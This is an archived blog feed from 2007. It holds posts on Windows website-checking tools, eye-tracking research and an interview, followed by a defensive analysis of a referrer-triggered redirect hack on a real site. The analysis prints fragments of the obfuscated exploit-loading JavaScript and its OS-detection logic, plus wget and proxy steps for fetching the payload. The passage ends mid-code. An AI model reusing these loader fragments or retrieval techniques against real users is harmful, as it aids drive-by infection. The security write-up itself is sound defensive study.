A set of command-line Windows website tools


If you have to do things over and over again, it’s a good idea to use a tool to make them easier. Windows is a bit limited (or very limited, compared to Linux) when it comes to batch scripts, and “wget” can only do so much right out of the box, so I sat down and wrote a few command-line tools to help me with some of the website checks that I like to do.

The tools I included in this set can do the following:

  • Check the result codes for a URL (and follow in the case of a redirect) – or for a list of URLs
  • Create a list of the links found on a URL (or just particular ones)
  • Create a list of the links and anchor texts found on a URL (or just particular ones)
  • Create a simple keyword analysis of the indexable content on a URL

You can get the download from here (requires the Windows .NET runtime v1.1):

WebResult

This tool accesses a URL and shows the result code that was returned. If the status is a redirect, it will display the redirection location and optionally follow it to check the final result code. It may be used with a list of URLs. The output is tab-delimited.

WebResult [options] (URL|urllist.txt)
--referer|-r [referrer] (default: none)
--user-agent|-u [user-agent] (default: "WebResult")
--follow-redirect|-f (default: not)
--headers|-h (displays the full response headers)

Check for correct canonical redirect:
Webresult http://johnmu.com/
Webresult http://www.johnmu.com/
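
For readers who want to see the mechanics, here is a rough Python sketch of what a WebResult-style check does: request the URL, report the status code, and optionally follow redirects. This is my own approximation, not the tool’s source; the function names are invented for illustration.

```python
from urllib import request
from urllib.error import HTTPError

class NoRedirect(request.HTTPRedirectHandler):
    # Return None so a 3xx response surfaces as an HTTPError
    # instead of being followed automatically.
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None

def is_redirect(status):
    return status in (301, 302, 303, 307, 308)

def format_row(url, status, location=""):
    # Tab-delimited output, like the tool produces
    return "\t".join((url, str(status), location))

def check_url(url, user_agent="WebResult", referer=None, follow=False):
    opener = request.build_opener(NoRedirect)
    rows = []
    while True:
        req = request.Request(url, headers={"User-Agent": user_agent})
        if referer:
            req.add_header("Referer", referer)
        try:
            status, location = opener.open(req).getcode(), ""
        except HTTPError as e:
            status, location = e.code, e.headers.get("Location", "")
        rows.append(format_row(url, status, location))
        if follow and is_redirect(status) and location:
            url = location  # like the -f option: chase the redirect
        else:
            return rows
```

Calling `check_url("http://johnmu.com/", follow=True)` would return one tab-delimited row per hop, which is roughly what the canonical-redirect check above relies on.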

WebLinks

This tool lists the links that are found on a URL. Note that it has an integrated HTML/XHTML parser – if the code on the page is not fully compliant, there is a chance of the parser not recognizing all links (it is fairly fail-safe, though).

This tool can use a cached version of the URL (from either this tool or one of the other ones) to save bandwidth. The cached versions are saved in the user’s temp-folder.

You have the choice of listing only outbound or only in-site links (to help simplify the output). Additionally, links marked with “rel=nofollow” can be flagged as such. The output is in alphabetical order.

WebLinks [options] (URL|urllist.txt)
--referer [referrer] (default: none)
--user-agent [user-agent] (default: "WebLinks")
--insite-only|-i (default: both in + out)
--outbound-only|-o (default: both in + out)
--ignore-nofollow|-n (default: off)
--cache|-c (default: off)
--verbose|-v (default: off)

Check the outbound links on a site.
WebLinks -o http://johnmu.com/
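
As a rough illustration of the parsing side, Python’s tolerant `html.parser` behaves much like the fail-safe parser described above: it does not choke on non-compliant markup, it just yields whatever links it can recognize. The sketch below is my own code, not the tool’s, and also shows the in-site/outbound filtering and nofollow marking:

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class LinkCollector(HTMLParser):
    # Tolerant of sloppy markup: html.parser does not raise on
    # non-compliant pages, it just reports the tags it can find.
    def __init__(self, base_url):
        super().__init__()
        self.base = base_url
        self.links = []
    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        a = dict(attrs)
        if a.get("href"):
            nofollow = "nofollow" in (a.get("rel") or "")
            self.links.append((urljoin(self.base, a["href"]), nofollow))

def list_links(html, base_url, insite_only=False, outbound_only=False):
    parser = LinkCollector(base_url)
    parser.feed(html)
    host = urlparse(base_url).hostname
    out = set()
    for url, nofollow in parser.links:
        insite = urlparse(url).hostname == host
        if (insite_only and not insite) or (outbound_only and insite):
            continue
        out.add((url, nofollow))
    return sorted(out)  # alphabetical, like the tool's output
```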

WebAnchors

This tool lists the links and anchor text as found on a URL. It uses the same HTML/XHTML parser as WebLinks. It can be used to find certain links (based on the URL, domain name, URL-snippets, or even parts of the anchor text). If the anchor for a link is an image, it will use the appropriate ALT-text, etc.

WebAnchors [options] (URL|urllist.txt)
--referer|-r [referrer] (default: none)
--user-agent|-u [user-agent] (default: "WebLinks")
--find-url|-f http://URL
--find-domain|-d DOMAIN.TLD
--find-anchor|-a TEXT
--find-url-snippet|-s TEXT
--url-only|-o (default: show anchor text as well)
--skip-nofollow|-n (default: off)
--cache|-c (default: off)
--verbose|-v (default: off)

Check the links with “Google” in the anchor text:
WebAnchors -a "Google" http://johnmu.com/
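
The anchor-text handling, including the ALT-text fallback for image links, can be approximated like this (again, my own sketch with invented names, not the tool’s source):

```python
from html.parser import HTMLParser

class AnchorCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.pairs = []    # (href, anchor text)
        self._href = None
        self._text = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self._href, self._text = a["href"], []
        elif tag == "img" and self._href is not None:
            # An image anchor contributes its ALT text instead
            self._text.append(a.get("alt") or "")
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            text = " ".join(t.strip() for t in self._text if t.strip())
            self.pairs.append((self._href, text))
            self._href = None

def find_anchors(html, anchor_text=None):
    # anchor_text mimics the --find-anchor filter (case-insensitive)
    parser = AnchorCollector()
    parser.feed(html)
    if anchor_text is None:
        return parser.pairs
    return [p for p in parser.pairs if anchor_text.lower() in p[1].lower()]
```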

WebKeywords

This tool does a simple keyword analysis on the indexable content of a URL. It also uses the above HTML/XHTML parser to extract the indexable text. It is possible to get single-word keywords or to use multi-word-phrases. The output is tab-delimited for re-use.

WebKeywords [options] (URL|urllist.txt)
--referer|-r [referrer] (default: none)
--user-agent|-u [user-agent] (default: "WebLinks")
--verbose|-v (default: off)
--words|-w [NUM] (phrases with number of words, default: 1)
--ignore-numbers|-n (default: off)
--cache|-c (cache web page, default: off)

Extract 3-word keyphrases from a page:
Webkeywords -w 3 http://johnmu.com/
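
The keyword side reduces to counting n-gram phrases over the indexable text. A minimal sketch in Python (my own code, assuming the tool does something comparable after stripping markup):

```python
import re
from collections import Counter

def keyword_phrases(text, words=1, ignore_numbers=False):
    # Lowercased word tokens; markup is assumed already stripped
    tokens = re.findall(r"[a-z0-9]+", text.lower())
    if ignore_numbers:  # mimics the -n option
        tokens = [t for t in tokens if not t.isdigit()]
    return Counter(
        " ".join(tokens[i:i + words])
        for i in range(len(tokens) - words + 1)
    )

def report(text, words=1, top=10):
    # Tab-delimited rows, most frequent phrase first
    counts = keyword_phrases(text, words)
    return ["%s\t%d" % (phrase, n) for phrase, n in counts.most_common(top)]
```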

Combined usage of these tools

Find common keyphrases on sites linked from a page (uses a temporary file to store the URLs):

webanchors -c -o -a "Google" http://johnmu.com >temp.txt
webkeywords -c -w 3 temp.txt

Check result codes of all URLs linked from a page:

weblinks -c http://johnmu.com >temp.txt
webresult temp.txt >links.tsv

Compare result codes for multiple accesses:

echo. >results.tsv
for /L %i IN (1,1,100) DO webresult http://johnmu.com/ >>results.tsv

or, more elaborately, to test for a referrer-based hack (all on one line):

for /L %i IN (1,1,100) DO webresult -u "Mozilla/5.0 (Windows; U) Gecko/20070725 Firefox/" -r http://www.google.com/search?q=johnmu http://johnmu.com/ >>results.tsv

I’d love to hear about your usage of these tools :) .

Copyright © 2010 johnmu.com. This Feed is for personal non-commercial use only. If you are not reading this material in your news aggregator, the site you are looking at is guilty of copyright infringement. Please contact johnmu.com so we can take legal action immediately.
Plugin by Taragana

August 31st 2007 News

But What Does It All Mean? Understanding Eye-Tracking Results (Part 2)


Part II:  What can you learn from eye-tracking data?

People often ask me what exactly they can learn from eye tracking.  I have a short version answer which is:

We track:

•    Where people look
•    Where people click
•    What people ignore
•    And we discover why they decide to click …or not click.

Why does it work?

•    Your eyes are hardwired into your brain and the eyes cannot lie.
•    Eyes can’t be "put down" like a mouse between clicks.
•    Eyes + clicks + subjective questions give a comprehensive view into the user experience.

This explanation is pretty common, but in reality, you can gain much more insight into the user experience from these kinds of studies.  Some advantages of eye tracking studies include:


•    Biometric measurements are more accurate than user feedback.  User feedback is invaluable, but notoriously unreliable.  Feedback regarding feelings, opinions, etc. must be acquired through survey methods.  However, measuring natural behavior gives a much more accurate picture of a user’s immediate experience than asking them after the task is complete.

•    Eye-tracking data can be used to accurately predict user feedback. This is true for questions regarding ease of use, ease of navigation, etc. All of these items also affect user confidence in the site and company.

•    Site navigation patterns can be mapped.  For instance, we can map out common navigation paths from a homepage to an interior page, and can begin to understand why some are being used more than others.

•    Results are representative of a “natural work environment”.  In other words, eye tracking does not require that a moderator be in the room with the user. Obviously the studies are done in a controlled environment, but not having other people in the room makes the experience very comfortable for users.

•    Viewing order of pages and page elements can be established.  We begin to understand what information is most likely to be seen/missed by users, and in what order.  For example, are users viewing a “Free Trial” offer 1st or 15th when seeing the page? Now you can know.

•    DHTML elements can be tracked separately.  The visual effectiveness and frequency of use of DHTML elements can be studied.

•    Short iterative testing can also be implemented. Because we can test prototypes (yes, even jpeg mock-ups), short eye tracking tests can be used to modify designs quickly.  This kind of testing is not a standard use of eye-tracking, but is proving to be very effective.

•    The effects of page element placement, copy, etc. can be ranked.  Should I change my header text? Move a menu to the right rail? Change the icon size or background? Certain layout changes can be ranked by how much effect they will have on viewing patterns.

One point to keep in mind is that eye-tracking, like all other usability tests, is not going to provide all of the answers by itself.  Eye-tracking is a valuable and powerful tool even when implemented alone.  But if you want the best overall picture, use it in conjunction with other usability tests, and as part of an iterative process.

Does eye tracking measure visual attention?

Yes, eye tracking can estimate the areas of an interface which receive visual attention.  The “bouncing around” of the eye trace shown in the video is created by a series of fast eye movements called saccades.  When your brain is planning an eye movement, it shifts covert attention to the eye’s destination [1].  The attentional shift and saccade movement have been shown to be inseparable [2].  And, of course, once you fixate something, your visual system starts processing the image.

Does this mean that we remember 100% of everything we fixated on a screen? Definitely not.  Our brains can suppress images, or use the visual signal to inform any number of low level cognitive functions. Does it mean that what we fixated has had an opportunity to directly affect our experience with an interface? Absolutely.

Gaze trace information helps us to understand the areas of a page which most helped to form a user’s visual experience with the site or email.


Here’s an EXCELLENT introduction to eye tracking and usability:
Matteo Penzo’s Introduction to Eyetracking: Seeing Through Your Users’ Eyes

[1]   Shipp S. (2004) The brain circuitry of attention. Trends Cogn Sci. 8, 223-30.
[2]   Peterson MS, Kramer AF, Irwin DE. (2004) Covert shifts of attention precede involuntary eye movements. Percept Psychophys. 66, 398-405.
[3]   Liversedge SP, Findlay JM. (2000) Saccadic eye movements and cognition. Trends Cogn Sci. 4, 6-14.

August 31st 2007 Uncategorized

But What Does It All Mean? Understanding Eye-Tracking Results (Part 1)


Part I:  Misinterpreting the data

In 2000, the Poynter Institute released their first study analyzing how users view online news websites. Yet, 7 years after eye-tracking made this first major impression on the usability and marketing industries, there still seems to be a lot of confusion over what eye-tracking data can actually tell you about how users interact with your site.

Vague descriptions of methodologies and misinterpretation of eye-tracking data have led to skepticism about the validity of eye-tracking in usability and marketing research.

Getting answers to common questions

In this next series of blog entries, I thought I’d take a shot at dispelling some small fraction of the confusion surrounding eye-tracking research.  Over the next few weeks I’ll address some recurring questions I get about our research, and the optimal use of eye-tracking studies.

Questions like:

•    What is a heatmap… really?
•    How to read a scan path… and what is a scan path?
•    How do you get the most out of eye-tracking analysis? (What many commercial software packages won’t tell you)
•    What is basic eye-movement terminology, and why is it important when interpreting results?

Bad web design is not a good thing.

Just to start us off, I thought I’d share one of my favorite misinterpretations of eye-tracking data.  This originally appeared in a blog entry last year:

I think web surfing is a hunting activity. The eye is looking for anamolies, for things that don’t belong. (That might be why the word anomaly, spelled wrong in the previous sentence, got your focus). […] One of the takeaways is that bad web design might actually be a good thing! Slightly bad design isn’t familiar. It’s off. It demands attention. (Very bad design demands the ‘back’ button, of course).

I have a love/hate relationship with Seth Godin’s article. I love it because it is a perfect cautionary tale about why we should take the time to stop and understand data.  Quick assumptions (especially based on eye-movement recordings) can lead to some surprising conclusions.  This erroneous interpretation has gotten quite a bit of attention, and has even been mentioned in meetings I’ve had with several designers.

So just a few notes to get us started:

•    Bad web design does not encourage viewer attention. It discourages the user from making an effort to understand web content, and only succeeds in getting users lost and frustrated. 

•    Novel interface design does change looking patterns.  However, as long as a website or email is well designed and intuitive, users will learn to navigate it quickly. 

•    Individual search patterns should almost never be considered alone. The video is interesting and fun to watch, but cannot by itself give useful information about how a broad range of people view the site.

•    Individual gaze plot data is always noisy.  This is because we normally move our eye 3 times a second.  A group of gaze plots must be examined to find patterns in page viewing.

Useful References:

Poynter Studies

2005 Enquiro, Eyetools, Did-It Study — Google

August 29th 2007 Uncategorized

Interview with Craig “cass-hacks”


Hi Craig, welcome to my blog :-) ! Craig is, for those that haven’t noticed, an alien from some solar system far away. At least that’s the conclusion I came to after reading his introduction, the overview page on his site and his “my first computer” posts. I’m pretty sure that he’s either an alien or very, very creative (as in creative writing), I mean seriously, “I built my own computer when I was 12.“?! Craig has been a frequent contributor in the Google Groups, bringing in a lot of background knowledge, helping with stylesheets, JavaScript and all sorts of other issues that arise on a regular basis.

I know that wasn’t a question but I would like to comment anyway. Although you are not the first to suggest I am not of this world, serious or not, I feel it is not so much a question of identifying the “where”, but identifying the “when”.

I think had I lived 150 to 200 years ago, I wouldn’t seem as much an alien as I do to so many people. More often than not, people who I communicate with over a period of time before ever meeting in person say something similar, I seem odd to them because they try to identify me with a place and fail but after meeting me in person, understand it is not a matter of identifying a place, but a place in time.

Many people are still put off after realizing that but a few people are able to take it in stride. You can tell a lot about a person by how they react to extreme situations and I guess I can be a bit extreme at times. :-)

Someone once called me an “anachronistic anomaly”. That seems to describe me as well as any other description I have heard, at least descriptions appropriate for mixed company. ;-)

So Craig, with a brain the size of a planet, I’m sure you have some really smart and cool things to do. What drives you to spend so much time in the Google webmaster help groups?

Good question, as in, the best questions have no real answers. ;-) The closest I think I can come to a real answer though is that I enjoy observing how things work. One of my first memories is of my parents taking me and my two sisters to a zoo where there was a carousel. While my sisters were busy watching the pretty horses, which were just carved and painted wood, I was watching the gears and shafts and cams and wheels looking to see how it all worked.

Later, much later, when I was working with particle accelerators, some the size of 5-story buildings, there would be some sort of problem, and one had to have a pretty good idea of what it was because, as often seemed the case and as Murphy’s Law would have it, problems usually occurred in the least accessible spot, and it could take up to a couple of days just to get to where the problem might be.

If the problem wasn’t there, all that time was wasted. But, it also wasn’t good enough just to know where the problem was, one also had to have an idea of how to fix it and maybe more importantly, how to keep it from happening again and again. All of what went into getting proficient at that was observing what one could of available data from what one could see and then coming up with a reasonable scenario as to what the cause might be where one couldn’t see and then testing that scenario as much as possible before putting any plan into action.

In Google’s Webmaster Tools Help Group, I am able to observe a lot of different situations and the more I see of a given situation, the more I have to go on to try to come up with possible scenarios to understand what may be happening. So I guess what drives me is what has always driven me, a desire to observe and understand.

How did you find the Google Webmaster Help groups in the first place? Looking at your first posts it doesn’t look like you had any particular problem that needed to be solved.

I found the group through the Google Webmaster Tools which I found through the “Add URL” page. I had just launched my first publicly accessible web site and had heard of submitting URLs to the various search engines so I asked “Professor Google” how to do it for the search engines I knew about the most and found what I was looking for. From there, I played with the Webmaster Tools for a very short time which was primarily due to there being no real data to look at when a site is first indexed and then started digging into the help files and was directed to the Groups forum. It was not so much that I was having any particular problem at the time, or since, but more so, someone felt it worthwhile to publish all that information for some reason, not reading it would seem to be a serious waste of both their time and mine.

You are right though, I didn’t have any particular problem nor do I think I would have asked had I one. I have been around long enough on various technical forums and the like to know that there is rarely a question that hasn’t been answered or doesn’t have an answer somewhere although very possibly being “hidden” and in need of being dug for.

On the other hand, I also know that for some questions, there are no answers or at least no answers likely to be forthcoming so before asking too much, I’d want to know what questions are even likely to receive an answer of any use.

But, search engines at that time I had very little experience with, other than as a search user and having already dealt with large amounts of data, it intrigued me as to how one might deal with essentially archiving the entire Internet and more importantly, making that archive available in an intelligent and useful manner. Large amounts of data don’t impress me as I’ve dealt with huge databases of tera and peta-record size but the easy, intelligent and fast access to the contained data is the real challenge.

What was it that grabbed your attention about the web? Why did you decide to put together your own website?

I wouldn’t say I was particularly “grabbed” by the web. It just seemed like a much easier platform to develop applications for. I’ve written in almost every language from machine code to C++ and at one time burning EEPROMs just to be able to test a section of code out. With PHP, Javascript and MySQL, I can whip up an application in a matter of hours. It may and very likely will look like hell but the basic functionality is there, sort of a proof of concept if you will.

As for cass-hacks specifically though, I’d built a lot of toys of various levels of usefulness over a period of time and although any one specific toy may not be all that useful, the processes that go into making them work is always useful because a given toy’s functionality is limited to what it was designed to do as well as a little bit being extensible for other purposes if designed well but the processes that go into making any toy work can be used over and over again to build whatever one can imagine. Also, every language has a lot of very simple syntax that is pretty boring to look at but can become interesting to the point of being exciting when combined in ways one might not originally have thought of.

Although straying a bit from the mark, I think the most interesting project I have documented on my site so far is one that gets the least amount of traffic. That project is a user notification system that is actually “agent” based, i.e. artificial life or as is commonly referred to as artificial intelligence, AI. Many people think that “AI” is some complex rule processor that attempts to simulate intelligent thought but that is only science fiction and pretty much had been given up on many years ago. Most of the work done in this area over the past couple of decades has been “Agent based”, creating simple little entities programmed to do very simple tasks and then releasing them to do what they were programmed to do. Where this ties in with what I have been talking about though is that once I came up with the method of implementing the functionality I wanted to support, it took me all of about 20 minutes to do it using DOM, CSS and Javascript whereas trying to do the same thing in just about any other programming environment would have taken days.

Once you have worked with different technologies, you usually get a grasp for the general problems that could come up when implementing them. What unexpected difficulties did you run into while working on your first site(s)?

This is going to be a boring answer. :-( None.

I guess from my past experience, I do things a little different than many people. I start out with a list of requirements for a given task and then look into the various methods of satisfying the requirements, with all their possible positives and minuses and then choose the available “tools” that allow me to do the most with the least. By the time I actually get to building something, it is sort of boring because then it is most often just a matter of “plugging and chugging”, a phrase I got from a Calculus professor in the past which basically means, set up the equations, plug in the variable data and then chug through the calculations. Once you got to the “Plug and Chug” stage, it was all pretty much done.

If you came to a situation where you absolutely had to get a website to rank high for competitive terms, which methods would you apply first?

Probably the first thing I would do is go out and hire an SEO. :-) Sorry, boring answer. OK, first, I’d have some limitations on whether or not I even attempted it in the first place. I’d have to be interested in and/or have some experience in the subject matter because getting different sites to rank well is not the same for all sites. Second, I’d take a look at what the past experience of the site has been and how it is doing currently and then I’d look at what are the short term and long term goals. I guess what all that means is that getting a website to rank high for competitive terms only, is a waste of time, energy and money.

But, if I didn’t care about all that and had someone else’s money to waste, I’d first make sure the site/page was even capable of ranking for the terms in the first place by making sure the terms even existed on any of the pages. Then I’d make sure there was as much information from as many different directions as possible on the subject of the target terms and then I’d work to get enough links to the site as necessary so as to make sure the page(s) was(were) even available for searches in the first place.

What I can’t do though is make people search for the targeted terms. So many people talk about wanting to rank well for this that and the other thing but so often is the case, no one is really searching for what is being targeted. I know some people use keyword generators to find out what people are searching for but I also feel that people who then decide what content to put on their site based solely on what will gain the most traffic are doing a disservice to both themselves as well as their potential visitors.

You seem to have seen a lot of corporate environments and worked in a lot of groups, is there anything about Google that was completely unexpected to you?

I feel another boring answer coming on. No, not really. Google, like all companies, is made up of people. Companies may have their policies but it is people that put them into action. A company could have the most negative policies in the world but due to the people in its employ, the company is seen in a much more positive light than a company that may have the most altruistic policies in the world with assholes implementing them.

Google seems to be the best of both worlds though, company policies seeming to tend toward ensuring equality for all involved with people implementing them that also seem genuinely concerned about the people they actually serve, the users of their various products and services. Were it not the case, I wouldn’t be sticking around because it wouldn’t make sense supporting someone else in being an asshole when I can enjoy being a much bigger one all by myself, why share? On the other hand, when I see a situation, much like with Google, where many people feel the need to view Google as evil or have ulterior motives where having any would be counterproductive, if I can in any way help someone to possibly see the other side of things, I feel I have done some good.

Were it not the case of Google being a basically positive company with obviously positive people working for it, there wouldn’t be so many of them out there putting themselves in the public eye and speaking as much for themselves as they do in efforts to try to explain as much as they can about the company they work for and with.

Turning the tables on Google, assume you had full access to everything and all the help that you needed, what would you change?

It wouldn’t really be a matter of “turning the tables” and although I definitely feel another boring answer coming on, I don’t know enough about what goes on internally to want to change anything. How could I know that what I wanted to change wouldn’t actually make things worse unless I knew why what I wanted to change was the way it was in the first place?

On the other hand, were I to have the opportunity, I would like to improve on some things, mainly things that I have been exposed to. I’d love to revamp the Webmaster tools and make them more timely and informative to the extent possible. Getting rid of tools that are of little use while expanding on others that may seem of little use but could be much more valuable if the data they offered was expanded and made more accessible to searching through. Also, I’d love to rewrite the Google Groups application as it seems to have the worst of all possible worlds.

Its use of Javascript has to be about the most counterproductive I have ever seen. There are also a number of things that could be done using Javascript, but aren’t currently, that could make the Groups much easier to use. About the only thing the Groups application has gotten right, in my opinion, is making it so that the functions of the Groups application work with Javascript enabled or disabled, which is actually a big accomplishment considering so many of the Javascript applications similar to it don’t work at all without Javascript.

Also, and I don’t know how much can be done in this area as I don’t know how it is currently implemented but one thing I would like to tackle would be improving the reliability of the various functions of the Groups application as it gets downright discouraging to use more often than I would like any application I was responsible for to be.

Is there anything more you’d like to add at the moment?

Other than thanking you for what has been my first interview in a LOOOOONNNNNGGGG time, I can’t think of anything I’d like to add.

Thanks for your time, Craig!

Although I’ve had a feeling this interview was coming, and dreading it, it wasn’t as painful as I thought so I thank you for making the process not too terribly intolerable! :-)


August 29th 2007 News

The website hack you’d never find


Warning: do not try the URLs here unless your system is locked down properly. I suggest using a “virtual machine” (I use VMware) to test things like this. The hack itself is complicated, the system is simple – skip the complicated part if you’re in a hurry.

It all started with a posting like this:

When I do a google search for [Jonathan Wentworth Associates] the first result is:

Jonathan Wentworth Associates, LTD
Welcome to Jonathan Wentworth Associates, a respected resource for world-class orchestral soloists,
conductors, opera, chamber music, chamber orchestras, …
www.jwentworth.com/ – 19k – Cached – Similar pages – Note this

The “Jonathan Wentworth Associates, LTD” is highlighted and is a link to the web site. If you place the mouse over the link, it shows http://www.jwentworth.com. However, if you click the link it immediately attempts to download the trojan. My McAfee immediately blocked it.

Looking at the page in question, it doesn’t appear to be hacked, it doesn’t appear to have any kind of scripts injected, etc. However, using LiveHTTPHeaders with Firefox, while doing the same steps (search, click on the top result) you see the following:

GET / HTTP/1.1
Host: www.jwentworth.com
HTTP/1.x 302 Found

GET /ind.htm?src=324&surl=www.jwentworth.com&sport=80&suri=%2F HTTP/1.1
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates
HTTP/1.x 302 Found
Location: http://www.jwentworth.com/

Without going through Google, the page is returned right away, just like it should. Search engine crawlers also get it like that. After the step through Google however, the site does a 302 redirect to some IP-Address and then returns to the original site. The average browser won’t see that, but if you’re quick you might spot it in the status-bar. A search engine crawler or any user who knew the address would get there without a redirect and not notice a thing.


That’s something that deserves to be looked at more closely. What’s on that server? How could I get to see it?

I had seen something similar a few months back which redirected me to an affiliate site the first time I went to that site through a Google referrer (in my case, the gmail.google.com referrer was enough). It would only trigger once per IP-Address. This looks like a similar hack.

When I was able to download the files, I had a nice collection of:

  • an encrypted javascript file that downloaded exploits based on browser and operating system
  • an exploit from free-spy-cam.net
  • an affiliate sales page for an antivirus software. Oh the irony. “We just infected you, buy our antivirus to get clean.” That is, if that software isn’t infected with something else.
  • an affiliate signup link on that page

A search engine crawler will never see these things. A user, coming in from Google, will get redirected and if the IP address is not known, it will trigger a few exploits based on the system the user has and then display an affiliate ad page. The next time the user comes, the redirect will happen but the normal page will be shown.

Spotting the hack on your site

It would be good to know how you could spot a hack like this on your site. In general, you wouldn’t be able to. You can check for this particular hack, but it might not trigger every time … not to mention that there are likely way too many hacks that you would need to check for.

A simple way to check for it would be to use wget to access the page, and check for strange redirects, eg:

>wget --user-agent Firefox --save-headers --referer "http://www.google.com/search?q=duuude" "http://www.jwentworth.com/"

However, as mentioned, that might not work every time.
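If you want to automate that kind of spot-check, the sketch below does roughly what the wget call does, but records every redirect hop. This is a minimal illustration assuming Python 3; the function names (`redirect_chain`, `is_suspicious_chain`) are mine, not part of any tool mentioned here. It flags the pattern described above: the page 302s away and a later hop points back at the original URL.

```python
import urllib.error
import urllib.parse
import urllib.request

REDIRECT_CODES = (301, 302, 303, 307, 308)

class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following redirects so each hop can be inspected."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None

def redirect_chain(url, referer, max_hops=5):
    """Return a list of (status, location) hops, sending a Google-style
    referer so referrer-triggered cloaking has a chance to fire."""
    opener = urllib.request.build_opener(NoRedirect)
    hops = []
    for _ in range(max_hops):
        req = urllib.request.Request(
            url, headers={"User-Agent": "Firefox", "Referer": referer})
        try:
            with opener.open(req) as resp:
                hops.append((resp.status, None))
            return hops
        except urllib.error.HTTPError as err:
            # With redirect handling disabled, 3xx responses surface here.
            location = err.headers.get("Location")
            hops.append((err.code, location))
            if err.code not in REDIRECT_CODES or not location:
                return hops
            url = urllib.parse.urljoin(url, location)
    return hops

def is_suspicious_chain(start_url, hops):
    """Flag the pattern described above: at least two redirects, with the
    last one pointing back at the URL we started from."""
    locations = [loc for code, loc in hops
                 if code in REDIRECT_CODES and loc]
    return (len(locations) >= 2
            and locations[-1].rstrip("/") == start_url.rstrip("/"))
```

Like the wget approach, this may not trigger the hack every time; the redirect apparently fires only once per IP address.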

The technical details

(skip this part, if you are lost already :-) )

I originally spotted the anomaly using LiveHTTPHeaders in Firefox while going through the steps: search, then click on the top result. You see the following:

GET / HTTP/1.1
Host: www.jwentworth.com
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates

HTTP/1.x 302 Found
Date: Thu, 23 Aug 2007 06:38:04 GMT
Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/
1.2 mod_bwlimited/1.4 PHP/4.4.6 FrontPage/ mod_ssl/
2.8.28 OpenSSL/0.9.7a
(… added space to prevent linking …)

GET /ind.htm?src=324&surl=www.jwentworth.com&sport=80&suri=%2F HTTP/1.1
Referer: http://www.google.com/search?q=Jonathan+Wentworth+associates
HTTP/1.x 302 Found
Date: Thu, 23 Aug 2007 06:38:05 GMT
Location: http://www.jwentworth.com/

A strange redirect like that is a really bad sign. How can we check that URL to see what they are sending? Apparently it can only be triggered once per IP address, and I had already used up that chance earlier. To view the initial page, I had to find an IP address that was not yet registered with the remote server (at least, that’s my explanation). I used a proxy server from one of the lists online. Using the proxy server and wget, I was able to access the page:

>set http_proxy=

>wget --user-agent "Firefox" --save-headers ""

Connecting to… connected.
Proxy request sent, awaiting response… 200 OK
Length: unspecified [text/html]
20:43:23 (79.20 KB/s) – `ind.htm@src=324&surl=www.jwentworth.com&sport=80&suri=%
2Findex.html.2′ saved [414]
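Response heads like the ones wget saves with `--save-headers` can also be scanned programmatically. The function below is a minimal sketch of my own (not from any of the tools here) that pulls out the status code and the Location header, which is all you need to spot a redirect:

```python
def parse_response_head(raw):
    """Pull the status code and Location header (if any) out of a raw
    HTTP response head, such as the one wget --save-headers keeps."""
    lines = raw.split("\r\n")
    # Status line looks like: HTTP/1.1 302 Found
    status = int(lines[0].split()[1])
    location = None
    for line in lines[1:]:
        if line.lower().startswith("location:"):
            location = line.split(":", 1)[1].strip()
    return status, location
```

Any saved response whose status is a 302 with a Location on a different host is worth a closer look.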

The page that was returned was a normal frameset:


  <frameset framespacing="0" border="0" rows="*,1" frameborder="0">
  <frame name="m" src="/site.htm?lng=1&trg=cln&oip=0&trk=zszuyhbinthnpzt" scrolling="no" noresize marginwidth="0" marginheight="0">
  <frame name="b" src="about:blank" marginwidth="0" marginheight="0" scrolling="auto">
  <noframes><BODY>Frames not supported by your browser.</BODY></noframes>
  </frameset><body></body></html>

The second frame was kind of funny: “about:blank”? The first one was a bit more interesting, though: notice the “trk” parameter.

Using Opera in a VMware virtual machine running Windows 2000 (heh, paranoid is good), I was able to access that page. I saved it for analysis (and had Ethereal running on the side, just to be sure). When I tried to refresh, it returned a 404: you could only view the page once.



The ZIP file contains a full copy of the files as downloaded by the Opera browser. Check the files at your own risk: they contain the full exploit.

The encrypted javascript file looks like this (pulled apart and reformatted; called “__cntr000.htm” in the ZIP file):


  <script language=JavaScript>
  function dc(sed) {
    l=sed.length;
    var b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,56,60,51,15,9,10,13,36 () 52,16);
    soot=sed;
    for(j=Math.ceil(l/b);j>0;j--) {
       r="";
       for(i=Math.min(l,b);i>0;l--,i--) {
         saam=t[soot.charCodeAt(p++)-48];
         sttp=saam<<s;w|=sttp;
  ()
       dd1="document";
       dd2="write(r)";
       eval(dd1+"."+dd2)
  ()
  dc("AVbFxuGqAk7s5OpH (…) G2ovPVoP9dATq_")
  </script>

The contents of the file are encrypted with some variation of Base64 encoding. You can decode the javascript by replacing the document.write(r) call with:
document.write("<xmp>" + r + "</xmp>");

Doing that will display the full contents of the encrypted data (called “__cntr000-decoded.htm” in the ZIP file).


  ()
    var WinOS=Get_Win_Version(IEversion);
    PatchList = clientInformation.appMinorVersion;
    switch (WinOS)
    {
     case "wXPw":
      XP_SP2_patched=0;
      FullVersion=clientInformation.appMinorVersion;
      PatchList=FullVersion.split(";");
      for (var i=0; i<PatchList.length; i++) { if (PatchList[i]=="SP2") { XP_SP2_patched=1; } }
      if (XP_SP2_patched==1) { ExploitNumber=9; }
  ()
      location.href="cnte-eshdvvw.htm?trk=zszuyhbinthnpzt";
  ()

It is yet another javascript, one that triggers an exploit based on the operating system (it even tests for XP Service Pack 2) and browser that the user is using. The exploit is also tagged with the “trk” parameter and couldn’t be downloaded separately. You can bet that it’s not a picture of your favorite celebrity, however.
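The dc() routine above is essentially a table-driven Base64 variant: each character is mapped through a lookup table (indexed by character code minus 48) to a 6-bit value, and the bits are packed back into bytes. Below is a hypothetical reconstruction of how such a scheme works; the function names and the identity/reversed tables are mine, not the actual table shipped with the exploit.

```python
def decode_custom(data, table):
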